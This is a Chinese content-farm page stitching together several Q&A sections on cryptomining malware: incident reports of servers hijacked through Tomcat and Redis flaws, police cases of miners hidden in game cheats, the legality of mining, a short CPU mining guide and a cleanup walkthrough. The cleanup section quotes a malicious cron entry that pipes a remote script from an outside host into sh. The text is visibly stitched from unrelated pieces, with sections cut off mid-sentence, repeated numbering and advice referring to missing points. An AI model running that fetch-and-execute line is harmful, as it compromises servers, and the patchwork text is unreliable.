百度程序员控制服务器挖矿

Ⅰ 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

Ⅱ 电脑挖矿违法吗

正常用着的电脑，却被非法控制，替别人“干活”，用户却浑然不知。原来，电脑被植入了挖矿程序及挖矿监控程序，监控程序只要监测到电脑CPU利用率低于50%，挖矿程序就会在后台静默启动，通过大量耗费被控电脑的CPU、GPU资源和电力资源，持续不断地挖取虚拟货币，并将这些虚拟货币转至控制者处，从而提现牟取暴利。
近期，潍坊市公安局网安支队会同青州市公安局在公安部、省公安厅指导下，在腾讯守护者计划安全团队协助下，按照公安部和省公安厅“净网2018专项行动”部署要求，成功破获部督“1.03”特大非法控制计算机信息系统案，目前抓获犯罪嫌疑人20名，取保候审11名，批捕9名。
经查，大连升平网络科技有限公司研发挖矿监控软件、集成挖矿程序后，通过发展下线代理，非法控制了全国389余万台电脑主机做广告增值收益，在100多万台电脑主机静默安装挖矿程序。两年期间共挖取DGB币（“极特币”）、DCR币（“德赛币”）、SC（“云产币”）币2600余万枚，共非法获利1500余万元。
据了解，虽然非法控制计算机信息系统的违法犯罪屡见不鲜，但是数量达到如此之巨，而且通过植入静默挖矿程序这种新型手段，进行虚拟货币变现，这在全国是比较少见的。

游戏外挂暗藏挖矿木马程序
2018年1月3日，潍坊市公安局网安支队接腾讯守护者计划安全团队报案称，腾讯电脑管家检测到一款游戏外挂暗藏了一款木马程序，该木马程序具备后台静默挖矿功能。
“挖矿，就是通过大量计算机运算获取数字货币-虚拟货币奖励，这个过程对电脑硬件配置要求比较高，主机经常长期高负荷运转，显卡、主板、内存等硬件会提前报废，对电脑的损害极大。”办案民警介绍。
办案民警说，违法犯罪人员通常提前调研市面上挖取难度较低的虚拟货币，通过云计算、显卡云计算业务非法控制用户的电脑主机，植入这种虚拟货币的挖矿程序进行挖矿，用户对此毫无察觉，只要电脑处于开机状态，挖矿程序就在后台静默运转，在挖取到大量矿币后迅速转至控制者那里变现提现，牟取高额利润。
初步统计，该木马程序感染数十万台用户机器。潍坊市公安局网安支队接案后，迅速研判案件线索，通过互联网提取到外挂木马样本，找到木马开发者建立的木马交流群，初步落查发现该款木马程序开发者在青州市。市局网安支队将该案情通报青州市公安局，由市局网安支队、青州市局成立专案组，对该案立案侦查。
专案组确定交流群群主身份为杨某宝。通过侦查发现，杨某宝一是建立了多个外挂讨论群，在群文件中共享外挂程序；二是利用“天下网吧论坛”版主的身份，将上传含有木马的外挂程序到“天下网吧”论坛供网民下载；三是通过网络网盘进行分享下载。
3月8日，专案组制定了详细的抓捕方案，在家中将杨某宝抓获。

Ⅲ 如何用电脑挖矿

要了解家用电脑挖矿这个问题，首先得解释清楚挖矿。在比特币出来以后，由于大家共同保存一个一模一样的记录交易的账本，因此需要一个一锤定音有决定权的人来负责记录这个账本。谁来记录呢？通过一道题目来决定，谁的计算机先算对了，那么它就拥有记账权，记录这个区块的所有数据，这就是挖矿的通俗解释。而奖励这个记账的人，获得了额外的一笔钱，这个就是挖矿的奖励，奖励给贡献了足够计算力来解题的人，也是我们为什么要去挖矿的原因，币就是钱，为了赚钱。比特币挖矿最开始只是CPU的事，接下来，为了更多的钱，技术员们研发出来显卡的、fpga的、ASIC芯片的，越来越快的记账方法。这里请注意，只是比特币的记账方法，比特币是sha256算法，只是适用于这种的，也只能在这种算法下进行挖矿。后来陆续出现了更多的算法Ethash、KawPow、CryptoNight、Zhash、X16R、Randomx……，列不完的哈。注意这里几个概念，算法（上面的一堆），设备（CPU、显卡、fpga、ASIC）他们是相辅相成的，一个币种可能有多个算法或单一算法来记账，同一设备也可以运行不同算法获得不同的奖励，区别只是记账效率的高低，赚钱的快慢。所以比特币可以用CPU、显卡、fpga、ASIC任何一种去挖，只是ASIC效率和性价比最高。下面回归主题，家用电脑能挖什么？家用电脑=CPU+显卡CPU比较合适的就是Randomx算法下的monero，显卡的话，则适合nicehash的自动选择。下面我应该说一下具体的挖矿教程来圆满这份答案，但是个人推荐用一个更简单更便捷的方法，甚至不需要了解上面所有的一切。

Ⅳ 如何用cpu挖矿

门罗币反矿机适合CPU挖矿

门罗币最新官方windows钱包下载地址:

1.下载好挖矿软件，解压。鼠标右键点击：“启动.cmd”，弹出菜单中选择“编辑”。

粘贴修改为之前你得到的钱包接收地址，这样挖矿得到的矿是进您的钱包。

2.双击启动.cmd，开始挖矿。

第1次运行可能会出现reboot等字样，您就按它的英文操作，右击“启动.cmd”，选择以管理员运行，然后重新电脑，使aes-ni生效后，再次正常高效运行挖矿赚钱。

Ⅳ 蔚来员工利用公司服务器挖矿，这一行为是否违法

蔚来员工利用职务之便，从2021年2月开始使用公司服务器进行挖矿，从中获取利益，这个行为明显已经触犯了我国的相关法律。

其实利用公司资源进行非法挖矿行为早有先例，在2018年1月到5月期间，网络一个运维员工就曾经在网络公司服务器上安装挖矿程序，通过公司的资源谋取暴利，之后将挖矿所得的虚拟货币卖出，从中获得10万元人民币，后来，在网络公司的追查下，这名员工才被发现，并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年，并处罚金1.1万元，扣押违法所得10万元整。

而对于挖矿这个行为，国家是坚决打击的，目前相关的省份也出台了相关的文件，表面上只是提高了挖矿公司的电费，实际上是为了让从事挖矿的人员知难而退，因为电费一旦上涨，那么相对应的挖矿成本也就增加了。

综上所述，该蔚来员工利用职务之便进行挖矿行为，已经涉嫌非法控制计算机信息系统罪，所以，他极有可能会因为此罪名而被起诉。

Ⅵ 什么是挖矿

挖矿就是记账的过程，矿工是记账员，区块链就是账本。怎样激励矿工来挖矿呢？比特币系统的记账权力是去中心化的，即每个矿工都有记账的权利。 成功抢到记账权的矿工，会获得系统新生的比特币奖励。因此，挖矿就是生产比特币的过程。中本聪最初设计比特币时规定每产生

Ⅶ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

Ⅷ 电脑挖矿合法吗

法律分析：违法。所谓网络“挖矿”，是指计算机被植入的软件程序，会通过特定算法，在计算机上进行运算。运算完成后，自动得到特定结果，从而产生虚拟币，这些虚拟币可在第三方平台换算，获得真实货币。

法律依据：《中华人民共和国刑法》 第二百八十五条 违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。

违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。

单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照各该款的规定处罚。

Ⅸ 新电脑病毒来袭:中招电脑会偷偷的挖矿给黑客赚钱

据华尔街日报消息，一种名为Adylkuzz的病毒正在蔓延，和近日在全球爆发的WannaCry勒索病毒不同的是，该病毒不会锁定用户的屏幕，也不会对用户的电脑进行加密，但它能够在用户毫不知情的情况下悄然占据电脑处理器资源，偷偷生产一种类似于比特币的数字货币。

据美国知名网络安全公司Proofpoint披露，该病毒早就在两星期以前就开始传播了，截至本周三已在全球感染了超过15万台的计算机，在一次攻击案例中，该病毒已经为黑客赚取了2.2万美元的非法获利。

实在做不到以上几点的话，用户可以先断网再开机，就是先拔掉网线然后开机，这样一来基本能够避免被勒索病毒感染，同时注意备份重要数据，不要打开不明链接、文件和邮件，尽量想办法给自己的电脑打上安全补丁。

原创声明：本文(不含图片)由文栋说自媒体网站原创，享有独立版权，如需转载敬请带上本段版权，本站对一切转载不保留版权的行为追究法律责任！